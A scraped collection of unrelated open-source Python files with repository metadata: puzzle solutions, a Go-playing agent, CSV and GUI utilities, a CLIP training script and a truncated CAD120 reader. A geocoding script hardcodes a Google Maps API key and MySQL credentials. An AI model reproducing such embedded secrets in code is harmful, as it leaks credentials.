# type: ignore with open("input") as f: program = [tuple(line.strip().split()) for line in f] cycle = 0 reg = 1 rem = 0 strength = 0 out = [] for inst in program: if inst[0] == "addx": rem = 2 op = lambda r: r + int(inst[1]) elif inst[0] == "noop": rem = 1 op = lambda r: r while rem > 0: px = cycle % 40 if reg in (px - 1, px, px + 1): out.append("#") else: out.append(".") rem -= 1 cycle += 1 if (cycle - 20) % 40 == 0: strength += cycle * reg # print(f"{cycle=} {reg=} strength={cycle * reg} {strength=}") if cycle % 40 == 0: out.append("\n") reg = op(reg) print("Part 1:", strength) print("".join(out), end="")
ocaballeror/adventofcode2022
10/day10.py
day10.py
py
791
python
en
code
0
github-code
36
13397163994
"""First prediction agent based on neural network.""" import numpy as np from dlgo.agent.base import Agent from dlgo.agent.helpers import is_point_an_eye from dlgo import encoders from dlgo import goboard from dlgo import kerasutil class DeepLearningAgent(Agent): """Deep Learning Agent Class.""" def __init__(self, model, encoder): """Constructor for Deep Learning Agent.""" Agent.__init__(self) self.model = model self.encoder = encoder def predict(self, game_state): """Return predicted move.""" encoded_state = self.encoder.encode(game_state) input_tensor = np.array([encoded_state]) return self.model.predict(input_tensor)[0] def select_move(self, game_state): """Select move from a ranked list.""" num_moves = self.encoder.board_width * self.encoder.board_height move_probs = self.predict(game_state) # Increase the distance between the more likely and least likely moves move_probs = move_probs ** 3 eps = 1e-6 # prevent move probabilities from getting stuck at 0 or 1 move_probs = np.clip(move_probs, eps, 1 - eps) move_probs = move_probs / np.sum(move_probs) # apply moves from ranked candidate list candidates = np.arrange(num_moves) # turn probabilities into ranked list of moves ranked_moves = np.random.choice( candidates, num_moves, replace=False, p=move_probs) for point_idx in ranked_moves: point = self.encoder.decode_point_index(point_idx) if game_state.is_valid_move(goboard.Move.play(point)) and \ not is_point_an_eye(game_state.board, point, game_state.next_player): # starting from the top find valid move that doesnt reduce eye return goboard.Move.play(point) # If no legal and non-self-destructive moves, pass return goboard.Move.pass_turn() def serialize(self, h5file): """Serialize deep-learning agent.""" h5file.create_group('encoder') h5file['encoder'].attrs['name'] = self.encoder.name() h5file['encoder'].attrs['board_width'] = self.encoder.board_width h5file['encoder'].attrs['board_height'] = self.encoder.board_height h5file.create_group('model') kerasutil.save_model_to_hdf5_group(self.model, h5file['model']) def load_prediction_agent(h5file): """Deserialize a deep learning agent from a HDF5 file.""" model = kerasutil.load_model_from_hdf5_group(h5file['model']) encoder_name = h5file['encoder'].attrs['name'] if not isinstance(encoder_name, str): encoder_name = encoder_name.decode('ascii') board_width = h5file['encoder'].attrs['board_width'] board_height = h5file['encoder'].attrs['board_height'] encoder = encoders.get_encoder_by_name(encoder_name, (board_width, board_height)) return DeepLearningAgent(model, encoder)
Nkonovalenko/GoAI
dlgo/agent/predict.py
predict.py
py
2,968
python
en
code
0
github-code
36
2582809755
#In this challenge, you get to be the _boss_. You oversee hundreds of employees across the country developing Tuna 2.0, a world-changing snack food based on canned tuna fish. Alas, being the boss isn't all fun, games, and self-adulation. The company recently decided to purchase a new HR system, and unfortunately for you, the new system requires employee records be stored completely differently. #Your task is to help bridge the gap by creating a Python script able to convert your employee records to the required format. Your script will need to do the following: #* Import the `employee_data.csv` file, which currently holds employee records like the below: #```csv #Emp ID,Name,DOB,SSN,State #214,Sarah Simpson,1985-12-04,282-01-8166,Florida #15,Samantha Lara,1993-09-08,848-80-7526,Colorado #411,Stacy Charles,1957-12-20,658-75-8526,Pennsylvania #``` #* Then convert and export the data to use the following format instead: #```csv #Emp ID,First Name,Last Name,DOB,SSN,State #214,Sarah,Simpson,12/04/1985,***-**-8166,FL #15,Samantha,Lara,09/08/1993,***-**-7526,CO #411,Stacy,Charles,12/20/1957,***-**-8526,PA #``` #* In summary, the required conversions are as follows: # * The `Name` column should be split into separate `First Name` and `Last Name` columns. # * The `DOB` data should be re-written into `MM/DD/YYYY` format. # * The `SSN` data should be re-written such that the first five numbers are hidden from view. # * The `State` data should be re-written as simple two-letter abbreviations. #* Special Hint: You may find this link to be helpful—[Python Dictionary for State Abbreviations](https://gist.github.com/afhaque/29f0f4f37463c447770517a6c17d08f5). import os import csv #Creating State Dictionaries us_state_abbrev = { 'Alabama': 'AL', 'Alaska': 'AK', 'Arizona': 'AZ', 'Arkansas': 'AR', 'California': 'CA', 'Colorado': 'CO', 'Connecticut': 'CT', 'Delaware': 'DE', 'Florida': 'FL', 'Georgia': 'GA', 'Hawaii': 'HI', 'Idaho': 'ID', 'Illinois': 'IL', 'Indiana': 'IN', 'Iowa': 'IA', 'Kansas': 'KS', 'Kentucky': 'KY', 'Louisiana': 'LA', 'Maine': 'ME', 'Maryland': 'MD', 'Massachusetts': 'MA', 'Michigan': 'MI', 'Minnesota': 'MN', 'Mississippi': 'MS', 'Missouri': 'MO', 'Montana': 'MT', 'Nebraska': 'NE', 'Nevada': 'NV', 'New Hampshire': 'NH', 'New Jersey': 'NJ', 'New Mexico': 'NM', 'New York': 'NY', 'North Carolina': 'NC', 'North Dakota': 'ND', 'Ohio': 'OH', 'Oklahoma': 'OK', 'Oregon': 'OR', 'Pennsylvania': 'PA', 'Rhode Island': 'RI', 'South Carolina': 'SC', 'South Dakota': 'SD', 'Tennessee': 'TN', 'Texas': 'TX', 'Utah': 'UT', 'Vermont': 'VT', 'Virginia': 'VA', 'Washington': 'WA', 'West Virginia': 'WV', 'Wisconsin': 'WI', 'Wyoming': 'WY', } #Setting CSV path csvpath = os.path.join( 'Resources', 'employee_data.csv') #Creating List to store Data emp_id = [] first_name = [] last_name = [] DOB= [] SSN = [] State = [] #Opening CSV file and keep the headers with open(csvpath , 'r') as csvfile: reader= csv.DictReader (csvfile) #Appending information in the list after being chnaged for row in reader: emp_id.append(row ['Emp ID']) first_name.append(row['Name'].split (" ")[0]) last_name.append(row['Name'].split (" ")[1]) DOB.append(row['DOB'].split('-')[1] + '/' + row['DOB'].split('-')[2] + '/' + row['DOB'].split('-')[0]) SSN.append('***-**-' + row['SSN'].split('-')[2]) State.append(us_state_abbrev[row['State']]) zipped_data = zip (emp_id, first_name, last_name,DOB, SSN, State) #naming output file output_file = os.path.join('Output', 'new_data.csv') #open and writes to csv file to the above folder destination with open(output_file, 'w') as csvwrite: cleanfile = csv.writer(csvwrite, delimiter = ",") cleanfile.writerow(['Emp ID', 'First Name', 'Last Name', 'DOB', 'SSN', 'State']) cleanfile.writerows(zipped_data)
pratik509/python-challenge
Pyboss/pyboss.py
pyboss.py
py
4,175
python
en
code
0
github-code
36
8158020365
import requests import urllib import json import time import pymysql def get_latitude_longtitude(address): address = urllib.parse.quote(address) url = "https://maps.googleapis.com/maps/api/geocode/json?address=" + address+"&key=AIzaSyAzA3f6KHEpViCBcLFSWS3a2ywVr3fCIvY" while True: res = requests.get(url) js = json.loads(res.text) if js["status"] != "OVER_QUERY_LIMIT": time.sleep(1) break result = js["results"][0]["geometry"]["location"] lat = result["lat"] lng = result["lng"] return lat, lng # db = pymysql.connect("us-cdbr-east-02.cleardb.com","b5647ade0475c5","40d209f8","heroku_56d2d16ef2b2e35", charset='utf8') db = pymysql.connect("localhost","root","xu.61i6u;6","heroku_56d2d16ef2b2e35") Qcursor = db.cursor() Icursor=db.cursor() Ccursor=db.cursor() print('開始定位!\n') try: select_sql = """SELECT id,adress FROM `page_data`""" Qcursor.execute(select_sql) i=0 while i<=816: arr=Qcursor.fetchone() print(f'編號:{arr[0]},地址:{arr[1]}') check_sql=f"""SELECT COUNT( `houseid` )AS A FROM `localtion` WHERE `houseid` = {arr[0]} """ Ccursor.execute(check_sql) count=Ccursor.fetchone() if count[0]==0: address=arr[1] lat, lng = get_latitude_longtitude(address) print(f'新增經緯度:{lat},{lng}\n====================================\n') try: sqlinsert = ("INSERT INTO localtion(houseid,lat,lng)" "VALUES(%s,%s,%s)") val = [arr[0],lat,lng] Icursor.execute(sqlinsert,val) db.commit() except: print('新增經位度失敗\n====================================\n') else: print('已定位\n====================================\n') time.sleep(1) i+=1 if not arr: break except: print("Select is failed") db.close()
NTUBimd1092/project-1
python/GeoAPI.py
GeoAPI.py
py
1,979
python
en
code
0
github-code
36
21037490132
''' Thought process: create new container, fill up all elements from nums1 and nums2 find median. Time complexity O(m+n) ''' class Solution: def findMedianSortedArrays(self, nums1: list[int], nums2: list[int]) -> float: combine_list = [] i1 = 0 i2 = 0 while i1 < len(nums1) and i2 < len(nums2): if nums1[i1] < nums2[i2]: combine_list.append(nums1[i1]) i1 += 1 else: combine_list.append(nums2[i2]) i2 += 1 combine_list += nums1[i1:len(nums1)] combine_list += nums2[i2:len(nums2)] if len(combine_list) < 1: return None elif len(combine_list) % 2 == 0: return (combine_list[int((len(combine_list)-1)/2)] + combine_list[int(len(combine_list)/2)])/2 else: return combine_list[int((len(combine_list)-1)/2)] ''' Another solution O(min(nums1, nums2)) Still needs to figure out ''' class Solution: def findMedianSortedArrays(self, nums1: List[int], nums2: List[int]) -> float: l1, l2 = len(nums1), len(nums2) if l1 > l2: nums1, nums2, l1, l2 = nums2, nums1, l2, l1 if l2 == 0: raise ValueError imin, imax, half_len = 0, l1, (l1+l2+1) / 2 while imin <= imax: i = int((imin + imax) / 2) j = int(half_len - i) if i < l1 and nums2[j-1] > nums1[i]: imin = i + 1 elif i > 0 and nums1[i-1] > nums2[j]: imax = i - 1 else: if i == 0: max_left = nums2[j-1] elif j == 0: max_left = nums1[i-1] else: max_left = max(nums1[i-1], nums2[j-1]) if (l1 + l2) % 2 == 1: return max_left if i == l1: min_right = nums2[j] elif j == l2: min_right = nums1[i] else: min_right = min(nums1[i], nums2[j]) return (max_left+min_right) / 2
lochuhsin/LeetCodeRepo
algorithm/array/4. Median of Two Sorted Arrays(hard).py
4. Median of Two Sorted Arrays(hard).py
py
2,038
python
en
code
3
github-code
36
16127772066
import cv2 import imageio import pathlib def fadeInGif(pathimg1, pathimg2, filegif, len=10, frames_per_second=2): img1 = cv2.imread(pathimg1) img2 = cv2.imread(pathimg2) listimg = [] for seq in range(0,len): fadein = seq/float(len) dst = cv2.addWeighted(img1, 1-fadein, img2, fadein, 0) listimg.append(dst) cv2.waitKey(1) print(fadein) imageio.mimsave(filegif.as_posix(), listimg, fps=frames_per_second) img1 = r"E:\Download\python\album\download.png" img2 = r"E:\Download\python\album\downloadt.png" fadeInGif(img1, img2, pathlib.Path('E:/Download/python/final.gif'))
doubsman/LedPanel64
python_dev/TransitionGif.py
TransitionGif.py
py
634
python
en
code
1
github-code
36
35438464473
from torch.utils.data import random_split import torch import argparse import json from pathlib import Path from dataloader import SquadLocalContextContrastiveDataset, QuacLocalContextContrastiveDataset, get_quac_sets, get_squad_sets from model import QClip from trainer import Trainer from tracker import WandBTracker from config import Config, Dataset import open_clip def generate_model(config: Config, device: torch.device = torch.device("cpu")): """ Generates the qclip and clip models """ clip_model, _, _ = open_clip.create_model_and_transforms(config.data.clip_arch, pretrained=config.data.clip_checkpoint) clip_model.to(device) tokenizer = open_clip.get_tokenizer(config.data.clip_arch) embedding_width = clip_model.encode_text(tokenizer(["hello", "world"]).to(device)).shape[1] print(f"Embedding width: {embedding_width}") qclip = QClip( embedding_width, config.model.output_dim, config.model.hidden_dim, projection_layers = config.model.num_layers, use_question_projection = config.model.question_projection, use_answer_projection = config.model.context_projection, temperature = config.train.temperature, simple_loss = config.train.simple_loss, return_loss = True, ) qclip.to(device) return qclip, clip_model def load_checkpoint(checkpoint: Path, config: Config = None, device: torch.device = torch.device("cpu")): """ Loads a checkpoint from the given path and returns the model, config, and start epoch """ if config is not None: print("Overriding checkpoint config with provided config") checkpoint = torch.load(checkpoint, map_location=device) model_state_dict = checkpoint["model"] optimizer_state_dict = checkpoint["optimizer"] start_epoch = checkpoint["epoch"] step = checkpoint["step"] if config is None: config = Config(**checkpoint["config"]) qclip, clip_model = generate_model(config, device) qclip.load_state_dict(model_state_dict) return qclip, clip_model, config, start_epoch, step, optimizer_state_dict def get_datasets(config: Config, clip_model): """ """ train_datasets = [] val_datasets = [] test_datasets = [] for dataset in config.data.datasets: if dataset == Dataset.SQUAD: train_set, test_set = get_squad_sets() clip_device = next(clip_model.parameters()).device tokenizer = open_clip.get_tokenizer(config.data.clip_arch) train_val_dataset = SquadLocalContextContrastiveDataset(train_set, config.data.context_radius, clip_model, tokenizer, normalize_clip=True, clip_device=clip_device) train_dataset, val_dataset = random_split(train_val_dataset, [0.9, 0.1]) test_dataset = SquadLocalContextContrastiveDataset(test_set, config.data.context_radius, clip_model, tokenizer, normalize_clip=True, clip_device=clip_device) train_datasets.append(train_dataset) val_datasets.append(val_dataset) test_datasets.append(test_dataset) elif dataset == Dataset.QUAC: train_set, test_set = get_quac_sets() clip_device = next(clip_model.parameters()).device tokenizer = open_clip.get_tokenizer(config.data.clip_arch) train_val_dataset = QuacLocalContextContrastiveDataset(train_set, config.data.context_radius, clip_model, tokenizer, normalize_clip=True, clip_device=clip_device) train_dataset, val_dataset = random_split(train_val_dataset, [0.9, 0.1]) test_dataset = QuacLocalContextContrastiveDataset(test_set, config.data.context_radius, clip_model, tokenizer, normalize_clip=True, clip_device=clip_device) train_datasets.append(train_dataset) val_datasets.append(val_dataset) test_datasets.append(test_dataset) else: raise ValueError(f"Unknown dataset {dataset}") train_dataset = torch.utils.data.ConcatDataset(train_datasets) val_dataset = torch.utils.data.ConcatDataset(val_datasets) test_dataset = torch.utils.data.ConcatDataset(test_datasets) return train_dataset, val_dataset, test_dataset def main(): parser = argparse.ArgumentParser() parser.add_argument("--checkpoint", type=str, default=None) parser.add_argument("--config", type=str, default=None) args = parser.parse_args() device = torch.device("cuda" if torch.cuda.is_available() else "cpu") config = None if args.config is not None: config = Config(**json.load(open(args.config))) qclip = None start_epoch = 0 if args.checkpoint is not None: qclip, clip_model, config, start_epoch, step, optimizer_state_dict = load_checkpoint(args.checkpoint, config, device) else: qclip, clip_model = generate_model(config, device) train, val, test = get_datasets(config, clip_model) tracker = WandBTracker( "QuestionContext", config.run.run_name, report_train_loss_every=1, run_id=config.run.resume_id, config=config, ) trainer = Trainer( train, val, test, qclip, config, tracker = tracker, shuffle = True ) if args.checkpoint is not None: trainer.load_optimizer_state_dict(optimizer_state_dict) tracker.step = step print("Training with config:") print(config.json(indent=4)) trainer.train( epochs = config.run.epochs, start_epoch = start_epoch, train_sample_limit = config.run.train_sample_limit, val_sample_limit = config.run.val_sample_limit, test_out_of = config.run.test_out_of, test_sample_limit = config.run.test_sample_limit, ) if __name__ == "__main__": main() # parser = argparse.ArgumentParser() # parser.add_argument("--run-name", type=str, default=None) # parser.add_argument("--save-dir", type=str, default=None) # parser.add_argument("--epochs", type=int, default=10) # parser.add_argument("--batch-size", type=int, default=64) # parser.add_argument("--train-sample-limit", type=int, default=None) # parser.add_argument("--val-sample-limit", type=int, default=None) # parser.add_argument("--test-sample-limit", type=int, default=None) # parser.add_argument("--test-out-of", type=int, default=100) # parser.add_argument("--context-radius", type=int, default=1) # parser.add_argument("--clip-arch", type=str, default="ViT-B-32-quickgelu") # parser.add_argument("--clip-checkpoint", type=str, default="laion400m_e32") # parser.add_argument("--output-dim", type=int, default=512) # parser.add_argument("--projection-layers", type=int, default=1) # parser.add_argument("--answer-projection", action='store_true') # parser.add_argument('--no-answer-projection', dest='answer-projection', action='store_false') # parser.add_argument("--question-projection", action='store_true') # parser.add_argument('--no-question-projection', dest='question-projection', action='store_false') # parser.add_argument("--simple-loss", action='store_true') # parser.add_argument('--no-simple-loss', dest='simple-loss', action='store_false') # parser.add_argument("--temperature", type=float, default=1.0) # parser.add_argument("--lr", type=float, default=1e-3) # parser.add_argument("--checkpoint", type=str, default=None) # parser.add_argument("--resume-run-id", type=str, default=None) # args = parser.parse_args() # # Load the datasets and CLIP model for preprocessing # train_set, test_set = get_sets() # model, _, preprocess = open_clip.create_model_and_transforms(args.clip_arch, pretrained=args.clip_checkpoint) # device = torch.device("cuda" if torch.cuda.is_available() else "cpu") # model.to(device) # tokenizer = open_clip.get_tokenizer(args.clip_arch) # embedding_width = model.encode_text(tokenizer(["hello", "world"]).to(device)).shape[1] # print(f"Embedding width: {embedding_width}") # train_val_dataset = SquadLocalContextContrastiveDataset(train_set, args.context_radius, model, tokenizer, normalize_clip=True, clip_device=device) # train_dataset, val_dataset = random_split(train_val_dataset, [0.9, 0.1]) # test_dataset = SquadLocalContextContrastiveDataset(test_set, args.context_radius, model, tokenizer, normalize_clip=True, clip_device=device) # # Configure and create the question-answer clip model # model_config = { # "embedding_dim": embedding_width, # "output_dim": args.output_dim, # "projection_layers": args.projection_layers, # "use_answer_projection": args.answer_projection, # "use_question_projection": args.question_projection, # "simple_loss": args.simple_loss, # "temperature": args.temperature # } # qclip = QClip(**model_config) # qclip.to(device) # # Configure the wandb tracker and pass context about this run # if args.run_name: # run_name = args.run_name # else: # print(f"Enter run name for wandb:") # run_name = input() # tracker = WandBTracker("QuestionContext", run_name, { # **model_config, # "dataset": "SQuAD", # "clip_arch": args.clip_arch, # "clip_checkpoint": args.clip_checkpoint, # "batch_size": args.batch_size, # "test_out_of": args.test_out_of, # "lr": args.lr, # "context_radius": args.context_radius, # }, report_train_loss_every=1, run_id=args.resume_run_id) # trainer = Trainer( # train_dataset, # val_dataset, # test_dataset, # qclip, # tracker = tracker, # batch_size = args.batch_size, # shuffle = True, # save_dir = args.save_dir, # lr = args.lr # ) # start_epoch = 0 # if args.checkpoint: # start_epoch = tracker.load(args.checkpoint, qclip, trainer.optimizer) # print(f"Loaded checkpoint from {args.checkpoint} at epoch {start_epoch} and step {tracker.step}.") # trainer.train( # epochs = 50, # start_epoch = start_epoch, # train_sample_limit = args.train_sample_limit, # val_sample_limit = args.val_sample_limit, # test_out_of=args.test_out_of, # test_sample_limit = args.test_sample_limit # )
Veldrovive/QuestionContext
main.py
main.py
py
10,429
python
en
code
0
github-code
36
6703674654
import os, shutil from datetime import datetime, timedelta from tkinter import * import tkinter as tk from tkinter import filedialog, messagebox, ttk import sqlite3 def load_gui(self): # GUI set up using tkinter. self.lbl_origin = tk.Label(self.master, bg = "silver", text = "Origin directory: ") self.lbl_origin.grid( row = 0, column = 0, padx = (20, 0), pady = (10,0), sticky = N+W) self.lst_origin = Listbox(self.master, width = 40, height = 8) self.lst_origin.grid(row = 1, column = 0, columnspan = 3, padx = (20, 0), pady = (10,0), sticky = N+W) self.lbl_dest = tk.Label(self.master, bg = "silver", text = "Destination directory: ") self.lbl_dest.grid(row = 2, column = 0, padx = (20, 0), pady = (10,0), sticky = N+W ) self.lst_dest = Listbox(self.master, width = 40, height = 8) self.lst_dest.grid(row = 3, column = 0, padx = (20, 0), pady = (10,0), sticky = N+W) self.btn_open = tk.Button(self.master, width = 25, height = 2, text = "Open Origin", command = lambda: open_file(self)) self.btn_open.grid( row = 1, column = 1, padx = (20,20), pady = (10,0), sticky = N+W) self.btn_dest = tk.Button(self.master, width = 25, height = 2, text = "Open Destination", command = lambda: dest_file(self)) self.btn_dest.grid( row = 1, column = 1, padx = (20,20), pady = (60,0), sticky = N+W) self.btn_copy = tk.Button(self.master, width = 25, height = 2, text = "Copy", command = lambda: copy_file(self)) self.btn_copy.configure(state = DISABLED) self.btn_copy.grid( row = 1, column = 1, padx = (20,20), pady = (110,0), sticky = N+E) self.btn_open = tk.Button(self.master, width = 25, height = 2, text = "Clear", command = lambda: clear_box(self)) self.btn_open.grid( row = 3, column = 1, padx = (20,20), pady = (50,0), sticky = N+W) self.btn_close = tk.Button(self.master, width = 25, height = 2, text = "Close", command = lambda: close_window(self)) self.btn_close.grid( row = 3, column = 1, padx = (20,20), pady = (100,0), sticky = N+E) create_db() get_db(self) def open_file(self): # This function runs when user clicks the Open Origin button. # Sets up global variable so the filedialog doesn't need to be called # multiple times. global src_folder # Clearing the list box. clear_box(self) create_db() src_folder = filedialog.askdirectory() if src_folder == '': messagebox.showwarning("Invalid Selection", "Please pick a valid directory.") src_folder = filedialog.askdirectory() else: folder_name = get_folder(src_folder) or_text = "Origin directory: " + folder_name self.lbl_origin.configure(text = or_text) get_data = get_db(self) files = get_files(src_folder, get_data) if(len(files) == 0): self.lst_origin.insert(END, "No new or modified files") else: # Iterating through the files and lists ones that modified recently. [self.lst_origin.insert(END, file) for file in files] def dest_file(self): # This function runs when user clicks the Open Destination button. global dest_folder dest_folder = filedialog.askdirectory() if dest_folder == '': messagebox.showwarning("Invalid Selection", "Please pick a valid directory.") dest_folder = filedialog.askdirectory() folder_name = get_folder(dest_folder) dest_text = "Destination directory: " + folder_name self.lbl_dest.configure(text = dest_text) self.btn_copy.configure(state = ACTIVE) def get_folder(folder): # A helper function to get the selected folder name. listA = folder.split('/') return str(listA[0])+"/.../"+str(listA[len(listA)-1]) def get_files(folder, time): # Getting the files from selected folder. files = os.listdir(src_folder) c_files = [] for file in files: path = src_folder+'/'+file # getting the modified time of the file. m_time = os.path.getmtime(path) # checking if file is recently created or edited. if time == 0: c_files.append(file) elif datetime.fromtimestamp(m_time) > time: # copying the file. c_files.append(file) return c_files def copy_file(self): # finding out the time 24 hours ago. data = [] time_id = round(datetime.today().timestamp()) get_data = get_db(self) files = get_files(src_folder, get_data) # Clearing the list box. clear_box(self) for file in files: path = os.path.join(src_folder, file) dst = os.path.join(dest_folder, file) if path == dst: messagebox.showwarning("Invalid Selection", "Origin and Destination folders are the same! \nPlease pick a valid directory.") else: shutil.copy(path, dst) data.append([time_id, file]) self.btn_copy.configure(state = DISABLED) insert_db(data) get_db(self) def clear_box(self): # Attached to Clear button to clear items from the list boxes. self.btn_copy.configure(state = DISABLED) self.lst_origin.delete(0, END) self.lst_dest.delete(0, END) self.lbl_origin.configure(text = "Origin directory: ") self.lbl_dest.configure(text = "Destination directory: ") def close_window(self): if messagebox.askokcancel("Exit program", "Okay to exit application"): # closing the app self.master.destroy os._exit(0) def create_db(): # Creting the database if it is not already exists. conn = sqlite3.connect('copyfiles.db') with conn: cur = conn.cursor() cur.execute("CREATE TABLE if not exists tbl_savetime(\ ID INTEGER PRIMARY KEY AUTOINCREMENT, \ col_timeid INTEGER, \ col_filename TEXT);") conn.commit() conn.close() def insert_db(data): # Inserting the copied filenames and the timestamp in the database. conn = sqlite3.connect('copyfiles.db') with conn: cur = conn.cursor() for item in data: cur.execute("""INSERT INTO tbl_savetime (col_timeid, col_filename) VALUES (?,?)""", (item[0], item[1])) conn.commit() conn.close() def get_db(self): # Getting the last updated time and the files updated from the database. conn = sqlite3.connect('copyfiles.db') cur = conn.cursor() cur.execute("""SELECT MAX(ID) AS ID, col_timeid, col_filename FROM tbl_savetime""") r_data = cur.fetchall() updated_time = r_data[0][1] if updated_time == None: self.lst_dest.insert(END, "No files copied yet!") #r_time = round(datetime.today().timestamp()) r_time = 0 else: r_time = datetime.fromtimestamp(updated_time) date = r_time.strftime('%B %d, %Y') time = r_time.strftime('%I:%M%p') self.lst_dest.insert(1, "Last file check: ") self.lst_dest.insert(2, "Date: {}".format(date)) self.lst_dest.insert(3, "Time: {}".format(time)) self.lst_dest.insert(4, "Files updated: ") cur.execute("""SELECT col_filename FROM tbl_savetime WHERE col_timeid ={id}""".format( id = updated_time)) c_data = cur.fetchall() [self.lst_dest.insert(5, item[0]) for item in c_data] conn.close() # returning the timestamp of the last check. return r_time
sajibhaskaran/Python_drills
PyDrill_db/modified_files_gui.py
modified_files_gui.py
py
7,843
python
en
code
0
github-code
36
21664219940
""" Receive an image - Global binarize image - Find word (connected component RETR_BOUNDARY) - Find Rectilinear Polygon Return an list of points in order """ import cv2 import numpy as np import sys import matplotlib.pyplot as plt PADDING = 2 def binarize(img): gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY) _, bin_img = cv2.threshold(gray, 0, 255, cv2.THRESH_BINARY_INV + cv2.THRESH_OTSU) return bin_img def bbox_words(bin_img): contours = cv2.findContours(bin_img, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)[-2] list_bboxes = [] for contour in contours: x, y, w, h = cv2.boundingRect(contour) list_bboxes.append((x-PADDING, y-PADDING, w+2*PADDING, h+2*PADDING)) return list_bboxes def draw_region(img, x1, y1, x2, y2): h, w = img.shape[:2] x1 = max(0, x1) y1 = max(0, y1) x2 = min(x2, w) y2 = min(y2, h) cv2.rectangle(img, (x1, y1), (x2, y2), 255, -1) def merge_words_2_line(bin_img, list_bboxes): list_bboxes.sort(key = lambda bbox: bbox[1]) cnt = len(list_bboxes) for i in range(len(list_bboxes)): for j in range(len(list_bboxes)): x1, y1, w1, h1 = list_bboxes[i] x2, y2, w2, h2 = list_bboxes[j] if y1 <= y2 and 2 * (y1 + h1 - y2) >= 0.5 * (h1 + h2): x_left, x_right = min(x1, x2), max(x1 + w1, x2 + w2) y_left, y_right = min(y1, y2), max(y1 + h1, y2 + h2) list_bboxes[i] = x_left, y_left, x_right - x_left, y_right - y_left list_bboxes[j] = x_left, y_left, x_right - x_left, y_right - y_left highlight_img = bin_img.copy() for i in range(cnt): x, y, w, h = list_bboxes[i] draw_region(highlight_img, x, y, x + w, y + h) cv2.imwrite('line.png', highlight_img) contours = cv2.findContours(highlight_img, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)[-2] return contours def merge_lines_2_paragraph(bin_img, contours): cnt = len(contours) highlight_img = bin_img.copy() cv2.drawContours(highlight_img, contours, -1, 255, -1) # for contour in contours: # x, y, w, h = cv2.boundingRect(contour) # draw_region(highlight_img, x, y, x + w, y + h) for contour_1 in contours: for contour_2 in contours: x1, y1, w1, h1 = cv2.boundingRect(contour_1) x2, y2, w2, h2 = cv2.boundingRect(contour_2) if (x1 != x2 or y1 != y2) and (y1 < y2 and y1 + h1 + h1//4 >= y2 - h2//4): x_left = max(x1, x2) x_right = min(x1 + w1, x2 + w2) if x_left < x_right: draw_region(highlight_img, x_left, y1 + h1, x_right, y2) contours = cv2.findContours(highlight_img, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)[-2] if (len(contours) == 0): return [] idx = -1 for i in range(len(contours)): if idx == -1 or cv2.contourArea(contours[idx]) < cv2.contourArea(contours[i]): idx = i epsilon = 0.001*cv2.arcLength(contours[idx], True) approx = cv2.approxPolyDP(contours[idx], epsilon, True) highlight_img = bin_img.copy() for i in range(len(approx)): j = (i + 1) % len(approx) cv2.line(highlight_img, (approx[i][0][0], approx[i][0][1]), (approx[j][0][0], approx[j][0][1]), 255) cv2.imwrite('highlight.png', highlight_img) return [(approx[i][0][0], approx[i][0][1]) for i in range(len(approx))] def main(img): cv2.imwrite('crop.png', img) bin_img = binarize(img) list_bboxes = bbox_words(bin_img) line_contours = merge_words_2_line(bin_img, list_bboxes) return merge_lines_2_paragraph(bin_img, line_contours) if __name__ == '__main__': img_path = sys.argv[1] img = cv2.imread(img_path) print(main(img))
qcuong98/clabel
rectilinear_polygon.py
rectilinear_polygon.py
py
3,815
python
en
code
0
github-code
36
28932021496
from django.shortcuts import render, redirect from models import Book # Create your views here. def index(request): books = Book.objects.all; context = { 'books': books } return render(request, 'app/index.html', context) def process(request): if request.method == "POST": Book.objects.create(title = request.POST['title'], category = request.POST['category'], author = request.POST['author']) return redirect('/')
melissaehong/AllProjects
Python/django/fullstackbooks/apps/app/views.py
views.py
py
460
python
en
code
1
github-code
36
37244411947
# -*- coding: utf-8 -*- """ CAD120 data reader that is compatible with QSRlib. :Author: Yiannis Gatsoulis <y.gatsoulis@leeds.ac.uk> :Organization: University of Leeds """ from __future__ import print_function, division import sys import argparse import timeit import ConfigParser import os try: import cPickle as pickle except ImportError: import pickle from cad120_data_reader import CAD120_Data_Reader from qsrlib.qsrlib import QSRlib, QSRlib_Request_Message class CAD120_QSR_Keeper(object): def __init__(self, description="", reader=None, qsrlib=None, which_qsr="", load_from_file=""): start = timeit.default_timer() print("\n--", self.__class__.__name__) print("Generating QSRs...") cloud_path = os.environ.get("CLOUD") self.description = description self.reader = reader self.qsrlib = qsrlib self.which_qsr = which_qsr self.world_qsr_traces = {} if load_from_file is not None and load_from_file != "": if cloud_path is not None: load_from_file = os.path.join(cloud_path, load_from_file) self.load(load_from_file) else: if type(self.reader) is not CAD120_Data_Reader: raise TypeError("Provide a CAD120_Data_Reader object") if type(self.qsrlib) is not QSRlib: raise TypeError("Provide a QSRlib object") if self.which_qsr == "": raise ValueError("Provide an appropriate QSR") self.make() stop = timeit.default_timer() print("QSRs generated in: %.2f secs" % (stop - start)) def make(self, qsrlib=None): if qsrlib: self.qsrlib = qsrlib if self.qsrlib is None: raise TypeError("Pass a QSRlib object") for k, world_trace in zip(self.reader.world_traces.keys(), self.reader.world_traces.values()): request_message = QSRlib_Request_Message(which_qsr=self.which_qsr, input_data=world_trace, include_missing_data=True) # out = self.qsrlib.request_qsrs(request_message=request_message) self.world_qsr_traces[k] = self.qsrlib.request_qsrs(request_message=request_message) def save(self, filename): print("Saving...") foo = {"description": self.description, "which_qsr": self.which_qsr, "world_qsr_traces": self.world_qsr_traces} with open(filename, "wb") as f: pickle.dump(foo, f) print("\t\tdone") def load(self, filename): print("Loading QSRs from", filename, end="") with open(filename, "rb") as f: foo = pickle.load(f) self.description = foo["description"] self.which_qsr = foo["which_qsr"] self.world_qsr_traces = foo["world_qsr_traces"] print("\t\tdone") if __name__ == '__main__': start = timeit.default_timer() options = {"sg1": "sg1", "rcc3": "rcc3_rectangle_bounding_boxes_2d"} parser = argparse.ArgumentParser(description="CAD120 QSR keeper in QSRlib format") parser.add_argument("-i", "--ini", help="ini file", required=True) parser_group = parser.add_mutually_exclusive_group(required=True) parser.add_argument("-s", "--save", help="filename to save qsrs", type=str) # parser_group.add_argument("-l", "--load", help="ini file that holds the qsrs filename, qsrs loaded from that file instead of being created from data", type=str) parser_group.add_argument("-l", "--load", dest="load", action="store_true", help="load the data qsrs the file in 'config.ini'") parser_group.add_argument("--qsr", help="choose qsr: 